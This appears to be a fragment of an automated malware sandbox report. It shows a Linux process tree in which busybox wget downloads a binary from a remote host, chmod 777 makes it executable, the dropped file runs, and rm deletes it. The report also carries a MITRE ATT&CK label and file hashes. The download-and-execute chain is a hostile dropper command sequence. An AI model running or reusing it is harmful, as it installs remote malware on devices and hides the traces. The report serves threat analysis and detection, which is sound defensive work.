/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵PID:1017
-
-
/bin/chmodchmod 777 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC./3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵PID:1020
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 176B
MD5: e1732e70f015e99d14dff1eeeaec9966
SHA1: c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256: 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512: 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7
-
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97